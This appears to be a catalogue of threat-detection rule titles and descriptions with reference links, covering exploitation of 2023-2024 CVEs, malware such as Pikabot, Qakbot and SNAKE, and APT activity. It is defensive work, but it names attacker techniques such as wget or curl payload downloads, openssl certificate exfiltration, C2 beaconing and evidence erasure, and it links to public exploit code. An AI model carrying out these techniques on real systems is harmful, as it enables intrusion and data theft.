Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs. https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261
Potential Information Disclosure CVE-2023-43261 Exploitation - Web Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs. https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261
Potential CVE-2023-46214 Exploitation Attempt Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104
Exploitation Attempt Of CVE-2023-46214 Using Public POC Code Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104
CVE-2023-46747 Exploitation Activity - Proxy Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP. https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
CVE-2023-46747 Exploitation Activity - Webserver Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP. https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string. https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
Potential Exploitation Attempt Of Undocumented WindowsServer RCE Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) https://github.com/SigmaHQ/sigma/pull/3946, https://twitter.com/hackerfantastic/status/1616455335203438592?s=20
Potential SocGholish Second Stage C2 DNS Query Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations, https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations, https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update
Potential COLDSTEEL RAT File Indicators Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
Potential COLDSTEEL Persistence Service DLL Creation Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
Potential COLDSTEEL Persistence Service DLL Load Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL RAT Anonymous User Process Execution Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL RAT Cleanup Command Execution Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL RAT Service Persistence Execution Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
Potential COLDSTEEL RAT Windows User Creation Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
COLDSTEEL Persistence Service Creation Detects the creation of new services potentially related to COLDSTEEL RAT https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
DarkGate - Autoit3.EXE File Creation By Uncommon Process Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main
DarkGate - Autoit3.EXE Execution Parameters Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main
DarkGate - User Created Via Net.EXE Detects creation of local users via the net.exe command with the name of "DarkGate" Internal Research
Griffon Malware Attack Pattern Detects process execution patterns related to Griffon malware as reported by Kaspersky https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
Injected Browser Process Spawning Rundll32 - GuLoader Activity Detects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. Internal Research
IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
Potential Pikabot C2 Activity Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
Potential Pikabot Discovery Activity Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242, https://tria.ge/231023-lpw85she57/behavioral2
Potential Pikabot Hollowing Activity Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt
Pikabot Fake DLL Extension Execution Via Rundll32.EXE Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity. https://github.com/pr0xylife/Pikabot, https://tria.ge/231004-tp8k6sch9t/behavioral2, https://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior, https://tria.ge/231212-r1bpgaefar/behavioral2
Qakbot Regsvr32 Calc Pattern Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot https://github.com/pr0xylife/Qakbot/
Potential Qakbot Rundll32 Execution Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. https://github.com/pr0xylife/Qakbot/
Qakbot Rundll32 Exports Execution Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. https://github.com/pr0xylife/Qakbot/
Qakbot Rundll32 Fake DLL Extension Execution Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. https://github.com/pr0xylife/Qakbot/
Qakbot Uninstaller Execution Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources, https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community, https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community
Rhadamanthys Stealer Module Launch Via Rundll32.EXE Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/, https://www.joesandbox.com/analysis/790122/0/html, https://twitter.com/anfam17/status/1607477672057208835
Rorschach Ransomware Execution Activity Detects Rorschach ransomware execution activity https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
SNAKE Malware Kernel Driver File Indicator Detects SNAKE malware kernel driver file indicator https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware WerFault Persistence File Creation Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware Installer Name Indicators Detects filename indicators associated with the SNAKE malware as reported by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential SNAKE Malware Installation CLI Arguments Indicator Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential SNAKE Malware Installation Binary Indicator Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential SNAKE Malware Persistence Service Execution Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware Covert Store Registry Key Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Potential Encrypted Registry Blob Related To SNAKE Malware Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
SNAKE Malware Service Persistence Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
Ursnif Redirection Of Discovery Commands Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware. Internal Research
Potential Compromised 3CXDesktopApp Beaconing Activity - DNS Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
Malicious DLL Load By Compromised 3CXDesktopApp Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
Potential Compromised 3CXDesktopApp Execution Detects execution of known compromised version of 3CXDesktopApp https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
Potential Suspicious Child Process Of 3CXDesktopApp Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/, https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/
Potential Compromised 3CXDesktopApp Update Activity Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/, https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats
Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
DLL Names Used By SVR For GraphicalProton Backdoor Hunts known SVR-specific DLL names. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Potential Compromised 3CXDesktopApp ICO C2 File Download Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/, https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor Hunts for known SVR-specific scheduled task names https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler Hunts for known SVR-specific scheduled task names https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Diamond Sleet APT DNS Communication Indicators Detects DNS queries related to Diamond Sleet APT activity https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT File Creation Indicators Detects file creation activity that is related to Diamond Sleet APT activity https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT DLL Sideloading Indicators Detects DLL sideloading activity seen used by Diamond Sleet APT https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT Process Activity Indicators Detects process creation activity indicators related to Diamond Sleet APT https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT Scheduled Task Creation - Registry Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Diamond Sleet APT Scheduled Task Creation Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
Potential Operation Triangulation C2 Beaconing Activity - DNS Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp
Potential Operation Triangulation C2 Beaconing Activity - Proxy Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp
Potential APT FIN7 Related PowerShell Script Created Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential APT FIN7 POWERHOLD Execution Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential POWERTRASH Script Execution Detects potential execution of the PowerShell script POWERTRASH https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
Lace Tempest File Indicators Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7 https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest PowerShell Evidence Eraser Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest PowerShell Launcher Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest Cobalt Strike Download Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lace Tempest Malware Loader Execution Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
Lazarus APT DLL Sideloading Activity Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/, https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/
Mint Sandstorm - AsperaFaspex Suspicious Process Execution Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
Mint Sandstorm - Log4J Wstomcat Process Execution Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
Mint Sandstorm - ManageEngine Suspicious Process Execution Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
Potential APT Mustang Panda Activity Against Australian Gov Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
Okta 2023 Breach Indicator Of Compromise Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate username used in your environnement. https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://developer.okta.com/docs/reference/api/event-types/
Onyx Sleet APT File Creation Indicators Detects file creation activity that is related to Onyx Sleet APT activity https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
PaperCut MF/NG Exploitation Related Indicators Detects exploitation indicators related to PaperCut MF/NG Exploitation https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
PaperCut MF/NG Potential Exploitation Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml
Peach Sandstorm APT Process Activity Indicators Detects process creation activity related to Peach Sandstorm APT https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details
Potential Peach Sandstorm APT C2 Communication Activity Detects potential C2 communication activity related to Peach Sandstorm APT https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details
UNC4841 - Email Exfiltration File Pattern Detects filename pattern of email related data used by UNC4841 for staging and exfiltration https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Barracuda ESG Exploitation Indicators Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - SSL Certificate Exfiltration Via Openssl Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Download Compressed Files From Temp.sh Using Wget Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Download Tar File From Untrusted Direct IP Via Wget Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation. https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
UNC4841 - Potential SEASPY Execution Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character. https://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py, https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1708, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
ScreenConnect User Database Modification Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
